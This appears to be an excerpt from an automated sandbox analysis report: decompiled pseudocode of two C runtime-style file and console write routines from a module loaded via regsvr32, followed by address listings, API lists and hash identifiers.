                                                                                                      				signed long long _t267;
                                                                                                      				long long _t269;
                                                                                                      				signed long long _t271;
                                                                                                      				long long _t276;
                                                                                                      				long long _t278;
                                                                                                      				long long _t280;
                                                                                                      				intOrPtr* _t289;
                                                                                                      				intOrPtr _t294;
                                                                                                      				long long _t295;
                                                                                                      				long long _t318;
                                                                                                      				void* _t326;
                                                                                                      				long long _t327;
                                                                                                      				void* _t328;
                                                                                                      				long long _t329;
                                                                                                      				long long _t331;
                                                                                                      				signed char* _t332;
                                                                                                      				signed char* _t333;
                                                                                                      				signed char* _t334;
                                                                                                      				intOrPtr* _t335;
                                                                                                      				void* _t336;
                                                                                                      				void* _t337;
                                                                                                      				signed long long _t338;
                                                                                                      				intOrPtr _t341;
                                                                                                      				signed long long _t343;
                                                                                                      				void* _t345;
                                                                                                      				intOrPtr* _t347;
                                                                                                      				intOrPtr _t351;
                                                                                                      				signed long long _t356;
                                                                                                      				signed long long _t359;
                                                                                                      				signed long long _t361;
                                                                                                      				void* _t364;
                                                                                                      				long long _t365;
                                                                                                      				long long _t367;
                                                                                                      				char _t368;
                                                                                                      				void* _t372;
                                                                                                      				signed char* _t373;
                                                                                                      				signed long long _t375;
                                                                                                      
                                                                                                      				_t263 = _t337;
                                                                                                      				_t336 = _t263 - 0x57;
                                                                                                      				_t338 = _t337 - 0xe0;
                                                                                                      				 *((long long*)(_t336 - 9)) = 0xfffffffe;
                                                                                                      				 *((long long*)(_t263 + 8)) = __rbx;
                                                                                                      				_t264 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				 *(_t336 + 0x17) = _t264 ^ _t338;
                                                                                                      				 *((long long*)(_t336 - 0x49)) = __r8;
                                                                                                      				_t289 = __rcx;
                                                                                                      				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
                                                                                                      				 *((long long*)(_t336 - 0x51)) = _t367;
                                                                                                      				 *(_t336 - 0x19) = __edx;
                                                                                                      				_t267 = __edx >> 6;
                                                                                                      				 *(_t336 - 0x59) = _t267;
                                                                                                      				 *(_t336 - 0x11) = __edx;
                                                                                                      				_t375 = __edx + __edx * 8;
                                                                                                      				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
                                                                                                      				 *((long long*)(_t336 - 0x29)) = _t269;
                                                                                                      				r12d = r9d;
                                                                                                      				_t365 = _t364 + __r8;
                                                                                                      				 *((long long*)(_t336 - 0x71)) = _t365;
                                                                                                      				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
                                                                                                      				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x7c1109f8;
                                                                                                      				0x7c109140();
                                                                                                      				_t294 =  *((intOrPtr*)(_t367 + 0x18));
                                                                                                      				r8d =  *(_t294 + 0xc);
                                                                                                      				 *(_t336 - 0x5d) = r8d;
                                                                                                      				 *((long long*)(__rcx)) = _t269;
                                                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                      				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x7c110db8;
                                                                                                      				_t271 = __edx >> 6;
                                                                                                      				 *(_t336 - 0x21) = _t271;
                                                                                                      				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
                                                                                                      				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
                                                                                                      				r12d = 1;
                                                                                                      				if (r8d != 0xfde9) goto 0x7c110bc0;
                                                                                                      				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t271 * 8));
                                                                                                      				if ( *_t347 == dil) goto 0x7c110a74;
                                                                                                      				_t372 = _t329 + 1;
                                                                                                      				if (_t372 - 5 < 0) goto 0x7c110a61;
                                                                                                      				if (_t372 == 0) goto 0x7c110b52;
                                                                                                      				r12d =  *((char*)(_t294 + 0x7ff87c17e8f0));
                                                                                                      				r12d = r12d + 1;
                                                                                                      				_t181 = r12d - 1;
                                                                                                      				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
                                                                                                      				_t341 = _t181;
                                                                                                      				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x7c110d27;
                                                                                                      				_t295 = _t329;
                                                                                                      				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
                                                                                                      				if (_t295 + 1 - _t372 < 0) goto 0x7c110ab9;
                                                                                                      				if (_t341 <= 0) goto 0x7c110aea;
                                                                                                      				E00007FF87FF87C1064D0( *( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
                                                                                                      				_t318 = _t329;
                                                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
                                                                                                      				if (_t318 + 1 - _t372 < 0) goto 0x7c110aed;
                                                                                                      				 *((long long*)(_t336 - 0x41)) = _t329;
                                                                                                      				_t276 = _t336 - 1;
                                                                                                      				 *((long long*)(_t336 - 0x39)) = _t276;
                                                                                                      				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                                                      				r12d = _t186;
                                                                                                      				r8d = _t186;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t367;
                                                                                                      				E00007FF87FF87C111744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
                                                                                                      				if (_t276 == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
                                                                                                      				goto 0x7c110c55;
                                                                                                      				_t368 =  *((char*)(_t276 + 0x7ff87c17e8f0));
                                                                                                      				_t212 = _t368 + 1;
                                                                                                      				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
                                                                                                      				if (_t212 - _t343 > 0) goto 0x7c110d55;
                                                                                                      				 *((long long*)(_t336 - 0x69)) = _t329;
                                                                                                      				 *((long long*)(_t336 - 0x31)) = _t331;
                                                                                                      				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                                                      				r14d = _t193;
                                                                                                      				r8d = _t193;
                                                                                                      				_t278 =  *((intOrPtr*)(_t336 - 0x51));
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t278;
                                                                                                      				E00007FF87FF87C111744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
                                                                                                      				if (_t278 == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t332 = _t331 + _t368;
                                                                                                      				r12d = r14d;
                                                                                                      				goto 0x7c110c55;
                                                                                                      				_t359 =  *(_t336 - 0x59);
                                                                                                      				_t351 =  *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t359 * 8));
                                                                                                      				_t213 =  *(_t351 + 0x3d + _t375 * 8);
                                                                                                      				if ((_t213 & 0x00000004) == 0) goto 0x7c110bf7;
                                                                                                      				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
                                                                                                      				 *((char*)(_t336 + 8)) =  *_t332;
                                                                                                      				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
                                                                                                      				r8d = 2;
                                                                                                      				goto 0x7c110c40;
                                                                                                      				r8d =  *_t332 & 0x000000ff;
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x7c110c3a;
                                                                                                      				_t373 =  &(_t332[1]);
                                                                                                      				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x7c110d93;
                                                                                                      				r8d = 2;
                                                                                                      				if (E00007FF87FF87C10E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t333 = _t373;
                                                                                                      				goto 0x7c110c55;
                                                                                                      				_t198 = E00007FF87FF87C10E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
                                                                                                      				if (_t198 == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t334 =  &(_t333[1]);
                                                                                                      				 *((long long*)(_t338 + 0x38)) = _t329;
                                                                                                      				 *((long long*)(_t338 + 0x30)) = _t329;
                                                                                                      				 *((intOrPtr*)(_t338 + 0x28)) = 5;
                                                                                                      				_t280 = _t336 + 0xf;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t280;
                                                                                                      				r9d = r12d;
                                                                                                      				_t345 = _t336 - 0x7d;
                                                                                                      				E00007FF87FF87C10D698();
                                                                                                      				r14d = _t198;
                                                                                                      				if (_t198 == 0) goto 0x7c110db8;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                      				r8d = _t198;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x7c110db0;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
                                                                                                      				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x7c110db8;
                                                                                                      				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x7c110d10;
                                                                                                      				 *((short*)(_t338 + 0x40)) = 0xd;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                      				_t128 = _t280 - 0xc; // 0x1
                                                                                                      				r8d = _t128;
                                                                                                      				_t326 = _t338 + 0x40;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x7c110db0;
                                                                                                      				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x7c110db8;
                                                                                                      				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
                                                                                                      				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x7c110db8;
                                                                                                      				r8d =  *(_t336 - 0x5d);
                                                                                                      				goto 0x7c110a23;
                                                                                                      				if (_t326 <= 0) goto 0x7c110d50;
                                                                                                      				_t335 = _t334 - _t373;
                                                                                                      				 *((char*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
                                                                                                      				if (1 - _t326 < 0) goto 0x7c110d2f;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
                                                                                                      				goto 0x7c110db8;
                                                                                                      				if (_t345 <= 0) goto 0x7c110d8d;
                                                                                                      				_t327 = _t329;
                                                                                                      				_t361 =  *(_t336 - 0x19) >> 6;
                                                                                                      				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
                                                                                                      				 *((char*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
                                                                                                      				_t328 = _t327 + 1;
                                                                                                      				if (2 - _t345 < 0) goto 0x7c110d6d;
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
                                                                                                      				goto 0x7c110db8;
                                                                                                      				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
                                                                                                      				 *( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
                                                                                                      				_t174 = _t328 + 1; // 0x1
                                                                                                      				 *((intOrPtr*)(_t289 + 4)) = _t174;
                                                                                                      				goto 0x7c110db8;
                                                                                                      				 *_t289 = GetLastError();
                                                                                                      				return E00007FF87FF87C103A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
                                                                                                      			}



















































                                                                                                      0x7ff87c110958
                                                                                                      0x7ff87c110966
                                                                                                      0x7ff87c11096a
                                                                                                      0x7ff87c110971
                                                                                                      0x7ff87c110979
                                                                                                      0x7ff87c11097d
                                                                                                      0x7ff87c110987
                                                                                                      0x7ff87c11098e
                                                                                                      0x7ff87c110995
                                                                                                      0x7ff87c110998
                                                                                                      0x7ff87c11099c
                                                                                                      0x7ff87c1109a3
                                                                                                      0x7ff87c1109aa
                                                                                                      0x7ff87c1109ae
                                                                                                      0x7ff87c1109bc
                                                                                                      0x7ff87c1109c0
                                                                                                      0x7ff87c1109cc
                                                                                                      0x7ff87c1109d1
                                                                                                      0x7ff87c1109d5
                                                                                                      0x7ff87c1109d8
                                                                                                      0x7ff87c1109db
                                                                                                      0x7ff87c1109e5
                                                                                                      0x7ff87c1109ee
                                                                                                      0x7ff87c1109f3
                                                                                                      0x7ff87c1109f8
                                                                                                      0x7ff87c1109fc
                                                                                                      0x7ff87c110a00
                                                                                                      0x7ff87c110a06
                                                                                                      0x7ff87c110a09
                                                                                                      0x7ff87c110a10
                                                                                                      0x7ff87c110a19
                                                                                                      0x7ff87c110a1d
                                                                                                      0x7ff87c110a25
                                                                                                      0x7ff87c110a29
                                                                                                      0x7ff87c110a2c
                                                                                                      0x7ff87c110a40
                                                                                                      0x7ff87c110a5b
                                                                                                      0x7ff87c110a64
                                                                                                      0x7ff87c110a68
                                                                                                      0x7ff87c110a72
                                                                                                      0x7ff87c110a77
                                                                                                      0x7ff87c110a8f
                                                                                                      0x7ff87c110a98
                                                                                                      0x7ff87c110a9e
                                                                                                      0x7ff87c110aa0
                                                                                                      0x7ff87c110aaa
                                                                                                      0x7ff87c110ab0
                                                                                                      0x7ff87c110ab6
                                                                                                      0x7ff87c110abc
                                                                                                      0x7ff87c110ac9
                                                                                                      0x7ff87c110ace
                                                                                                      0x7ff87c110ada
                                                                                                      0x7ff87c110aea
                                                                                                      0x7ff87c110af8
                                                                                                      0x7ff87c110b03
                                                                                                      0x7ff87c110b05
                                                                                                      0x7ff87c110b09
                                                                                                      0x7ff87c110b0d
                                                                                                      0x7ff87c110b1a
                                                                                                      0x7ff87c110b1c
                                                                                                      0x7ff87c110b1f
                                                                                                      0x7ff87c110b22
                                                                                                      0x7ff87c110b33
                                                                                                      0x7ff87c110b3c
                                                                                                      0x7ff87c110b4a
                                                                                                      0x7ff87c110b4d
                                                                                                      0x7ff87c110b55
                                                                                                      0x7ff87c110b5e
                                                                                                      0x7ff87c110b66
                                                                                                      0x7ff87c110b6f
                                                                                                      0x7ff87c110b75
                                                                                                      0x7ff87c110b79
                                                                                                      0x7ff87c110b85
                                                                                                      0x7ff87c110b87
                                                                                                      0x7ff87c110b8a
                                                                                                      0x7ff87c110b8d
                                                                                                      0x7ff87c110b91
                                                                                                      0x7ff87c110ba2
                                                                                                      0x7ff87c110bab
                                                                                                      0x7ff87c110bb1
                                                                                                      0x7ff87c110bb4
                                                                                                      0x7ff87c110bbb
                                                                                                      0x7ff87c110bc0
                                                                                                      0x7ff87c110bc4
                                                                                                      0x7ff87c110bcc
                                                                                                      0x7ff87c110bd4
                                                                                                      0x7ff87c110bdb
                                                                                                      0x7ff87c110be0
                                                                                                      0x7ff87c110be6
                                                                                                      0x7ff87c110beb
                                                                                                      0x7ff87c110bf5
                                                                                                      0x7ff87c110bf7
                                                                                                      0x7ff87c110c07
                                                                                                      0x7ff87c110c09
                                                                                                      0x7ff87c110c11
                                                                                                      0x7ff87c110c1a
                                                                                                      0x7ff87c110c2f
                                                                                                      0x7ff87c110c35
                                                                                                      0x7ff87c110c38
                                                                                                      0x7ff87c110c47
                                                                                                      0x7ff87c110c4f
                                                                                                      0x7ff87c110c55
                                                                                                      0x7ff87c110c58
                                                                                                      0x7ff87c110c5d
                                                                                                      0x7ff87c110c62
                                                                                                      0x7ff87c110c6a
                                                                                                      0x7ff87c110c6e
                                                                                                      0x7ff87c110c73
                                                                                                      0x7ff87c110c76
                                                                                                      0x7ff87c110c7f
                                                                                                      0x7ff87c110c84
                                                                                                      0x7ff87c110c89
                                                                                                      0x7ff87c110c8f
                                                                                                      0x7ff87c110c98
                                                                                                      0x7ff87c110cae
                                                                                                      0x7ff87c110cbc
                                                                                                      0x7ff87c110cc3
                                                                                                      0x7ff87c110cce
                                                                                                      0x7ff87c110cd5
                                                                                                      0x7ff87c110cda
                                                                                                      0x7ff87c110ce3
                                                                                                      0x7ff87c110ce3
                                                                                                      0x7ff87c110ce7
                                                                                                      0x7ff87c110cf7
                                                                                                      0x7ff87c110d01
                                                                                                      0x7ff87c110d07
                                                                                                      0x7ff87c110d0a
                                                                                                      0x7ff87c110d14
                                                                                                      0x7ff87c110d1e
                                                                                                      0x7ff87c110d22
                                                                                                      0x7ff87c110d2a
                                                                                                      0x7ff87c110d2c
                                                                                                      0x7ff87c110d3e
                                                                                                      0x7ff87c110d4e
                                                                                                      0x7ff87c110d50
                                                                                                      0x7ff87c110d53
                                                                                                      0x7ff87c110d58
                                                                                                      0x7ff87c110d5a
                                                                                                      0x7ff87c110d61
                                                                                                      0x7ff87c110d69
                                                                                                      0x7ff87c110d7c
                                                                                                      0x7ff87c110d82
                                                                                                      0x7ff87c110d8b
                                                                                                      0x7ff87c110d8d
                                                                                                      0x7ff87c110d91
                                                                                                      0x7ff87c110d95
                                                                                                      0x7ff87c110da2
                                                                                                      0x7ff87c110da8
                                                                                                      0x7ff87c110dab
                                                                                                      0x7ff87c110dae
                                                                                                      0x7ff87c110db6
                                                                                                      0x7ff87c110de1

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                      • Instruction ID: c20ee252d58c71e015aaea9534b493050686d9877b88ff522ce30f36c42c62c4
                                                                                                      • Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                      • Instruction Fuzzy Hash: EED1C123F28A818AEB51CF69D4402AC37B1FB567D8B244236DE5D97B99CE3CD486C710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 29%
                                                                                                      			E00007FF87FF87C11129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                      				signed short _v80;
                                                                                                      				void* _v92;
                                                                                                      				signed int _v96;
                                                                                                      				intOrPtr _v104;
                                                                                                      				intOrPtr _v108;
                                                                                                      				long _v112;
                                                                                                      				signed int _v120;
                                                                                                      				long long _v128;
                                                                                                      				signed int _v136;
                                                                                                      				void* __rbx;
                                                                                                      				void* __rsi;
                                                                                                      				void* __rbp;
                                                                                                      				void* _t107;
                                                                                                      				long _t116;
                                                                                                      				signed int _t117;
                                                                                                      				void* _t122;
                                                                                                      				signed int _t128;
                                                                                                      				intOrPtr _t146;
                                                                                                      				intOrPtr _t147;
                                                                                                      				void* _t169;
                                                                                                      				signed long long _t182;
                                                                                                      				signed long long _t186;
                                                                                                      				signed long long _t189;
                                                                                                      				signed long long _t208;
                                                                                                      				signed int _t209;
                                                                                                      				void* _t210;
                                                                                                      				void* _t212;
                                                                                                      				void* _t228;
                                                                                                      				signed long long _t229;
                                                                                                      				signed short* _t230;
                                                                                                      				void* _t231;
                                                                                                      				signed short* _t232;
                                                                                                      
                                                                                                      				_t122 = __ebx;
                                                                                                      				r15d = r8d;
                                                                                                      				_t186 = __r9;
                                                                                                      				_t230 = __rdx;
                                                                                                      				if (r8d == 0) goto 0x7c111599;
                                                                                                      				if (__rdx != 0) goto 0x7c111303;
                                                                                                      				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                      				r8d = 0;
                                                                                                      				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                      				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                      				r9d = 0;
                                                                                                      				_v128 = __r9;
                                                                                                      				_v136 = _t209;
                                                                                                      				E00007FF87FF87C109674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                                                      				goto 0x7c11159b;
                                                                                                      				_t189 = __ecx >> 6;
                                                                                                      				_v120 = _t189;
                                                                                                      				_t229 = __ecx + __ecx * 8;
                                                                                                      				if (_t210 - 1 - 1 > 0) goto 0x7c111339;
                                                                                                      				if (( !r15d & 0x00000001) == 0) goto 0x7c1112cc;
                                                                                                      				if (( *( *((intOrPtr*)(0x7c17f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x7c11134f;
                                                                                                      				r8d = 0x7ff87c17f942;
                                                                                                      				E00007FF87FF87C111E38(r12d);
                                                                                                      				_v96 = _t209;
                                                                                                      				if (E00007FF87FF87C1116A0(r12d, __ecx) == 0) goto 0x7c111485;
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x7c17f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x7c111485;
                                                                                                      				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x7c111396;
                                                                                                      				0x7c109140();
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x7c1113b2;
                                                                                                      				_t182 =  *((intOrPtr*)(0x7c17f940 + _v120 * 8));
                                                                                                      				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x7c111485;
                                                                                                      				if (GetConsoleMode(??, ??) == 0) goto 0x7c11147a;
                                                                                                      				if (sil == 0) goto 0x7c111457;
                                                                                                      				sil = sil - 1;
                                                                                                      				if (sil - 1 > 0) goto 0x7c11151e;
                                                                                                      				_t228 = _t230 + _t231;
                                                                                                      				_v112 = _t209;
                                                                                                      				_t232 = _t230;
                                                                                                      				if (_t230 - _t228 >= 0) goto 0x7c111514;
                                                                                                      				_v80 =  *_t232 & 0x0000ffff;
                                                                                                      				_t107 = E00007FF87FF87C111E40( *_t232 & 0xffff);
                                                                                                      				_t128 = _v80 & 0x0000ffff;
                                                                                                      				if (_t107 != _t128) goto 0x7c111449;
                                                                                                      				_t146 = _v108 + 2;
                                                                                                      				_v108 = _t146;
                                                                                                      				if (_t128 != 0xa) goto 0x7c11143a;
                                                                                                      				if (E00007FF87FF87C111E40(0xd) != 0xd) goto 0x7c111449;
                                                                                                      				_t147 = _t146 + 1;
                                                                                                      				_v108 = _t147;
                                                                                                      				if ( &(_t232[1]) - _t228 >= 0) goto 0x7c111514;
                                                                                                      				goto 0x7c1113fa;
                                                                                                      				_v112 = GetLastError();
                                                                                                      				goto 0x7c111514;
                                                                                                      				r9d = r15d;
                                                                                                      				_v136 = __r9;
                                                                                                      				E00007FF87FF87C110958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
                                                                                                      				asm("movsd xmm0, [eax]");
                                                                                                      				goto 0x7c111519;
                                                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(0x7c17f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x7c1114e1;
                                                                                                      				_t169 = sil;
                                                                                                      				if (_t169 == 0) goto 0x7c1114cd;
                                                                                                      				if (_t169 == 0) goto 0x7c1114b9;
                                                                                                      				if (_t147 - 1 != 1) goto 0x7c111529;
                                                                                                      				r9d = r15d;
                                                                                                      				E00007FF87FF87C110EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                      				goto 0x7c11146e;
                                                                                                      				r9d = r15d;
                                                                                                      				E00007FF87FF87C111004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                                                      				goto 0x7c11146e;
                                                                                                      				r9d = r15d;
                                                                                                      				E00007FF87FF87C110DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                      				goto 0x7c11146e;
                                                                                                      				r8d = r15d;
                                                                                                      				_v136 = _v136 & _t182;
                                                                                                      				_v112 = _t182;
                                                                                                      				_v104 = 0;
                                                                                                      				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x7c111511;
                                                                                                      				_t116 = GetLastError();
                                                                                                      				_v112 = _t116;
                                                                                                      				asm("movsd xmm0, [ebp-0x30]");
                                                                                                      				asm("movsd [ebp-0x20], xmm0");
                                                                                                      				if (_t116 != 0) goto 0x7c111592;
                                                                                                      				_t117 = _v96;
                                                                                                      				if (_t117 == 0) goto 0x7c111568;
                                                                                                      				if (_t117 != 5) goto 0x7c111558;
                                                                                                      				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                                                      				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                      				 *(_t186 + 0x34) = _t117;
                                                                                                      				goto 0x7c1112fb;
                                                                                                      				_t208 = _t186;
                                                                                                      				E00007FF87FF87C10B3DC(_v96, _t208);
                                                                                                      				goto 0x7c1112fb;
                                                                                                      				if (( *( *((intOrPtr*)(0x7c17f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x7c11157a;
                                                                                                      				if ( *_t230 == 0x1a) goto 0x7c111599;
                                                                                                      				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                                                      				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                                                      				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                      				goto 0x7c1112fb;
                                                                                                      				goto 0x7c11159b;
                                                                                                      				return 0;
                                                                                                      			}



































                                                                                                      0x7ff87c11129c
                                                                                                      0x7ff87c1112b2
                                                                                                      0x7ff87c1112b8
                                                                                                      0x7ff87c1112bb
                                                                                                      0x7ff87c1112c1
                                                                                                      0x7ff87c1112ca
                                                                                                      0x7ff87c1112cc
                                                                                                      0x7ff87c1112d1
                                                                                                      0x7ff87c1112d4
                                                                                                      0x7ff87c1112da
                                                                                                      0x7ff87c1112e1
                                                                                                      0x7ff87c1112e9
                                                                                                      0x7ff87c1112ec
                                                                                                      0x7ff87c1112f1
                                                                                                      0x7ff87c1112f6
                                                                                                      0x7ff87c1112fe
                                                                                                      0x7ff87c111313
                                                                                                      0x7ff87c111317
                                                                                                      0x7ff87c11131b
                                                                                                      0x7ff87c11132e
                                                                                                      0x7ff87c111337
                                                                                                      0x7ff87c11133f
                                                                                                      0x7ff87c111346
                                                                                                      0x7ff87c11134a
                                                                                                      0x7ff87c111352
                                                                                                      0x7ff87c111368
                                                                                                      0x7ff87c111377
                                                                                                      0x7ff87c111381
                                                                                                      0x7ff87c111386
                                                                                                      0x7ff87c1113a1
                                                                                                      0x7ff87c1113a3
                                                                                                      0x7ff87c1113ac
                                                                                                      0x7ff87c1113c7
                                                                                                      0x7ff87c1113d0
                                                                                                      0x7ff87c1113d6
                                                                                                      0x7ff87c1113dd
                                                                                                      0x7ff87c1113e3
                                                                                                      0x7ff87c1113e7
                                                                                                      0x7ff87c1113eb
                                                                                                      0x7ff87c1113f1
                                                                                                      0x7ff87c111401
                                                                                                      0x7ff87c111405
                                                                                                      0x7ff87c11140a
                                                                                                      0x7ff87c111411
                                                                                                      0x7ff87c111413
                                                                                                      0x7ff87c111416
                                                                                                      0x7ff87c11141d
                                                                                                      0x7ff87c111431
                                                                                                      0x7ff87c111433
                                                                                                      0x7ff87c111435
                                                                                                      0x7ff87c111441
                                                                                                      0x7ff87c111447
                                                                                                      0x7ff87c11144f
                                                                                                      0x7ff87c111452
                                                                                                      0x7ff87c111457
                                                                                                      0x7ff87c11145a
                                                                                                      0x7ff87c111469
                                                                                                      0x7ff87c11146e
                                                                                                      0x7ff87c111475
                                                                                                      0x7ff87c11148e
                                                                                                      0x7ff87c111492
                                                                                                      0x7ff87c111495
                                                                                                      0x7ff87c11149a
                                                                                                      0x7ff87c11149f
                                                                                                      0x7ff87c1114a5
                                                                                                      0x7ff87c1114b2
                                                                                                      0x7ff87c1114b7
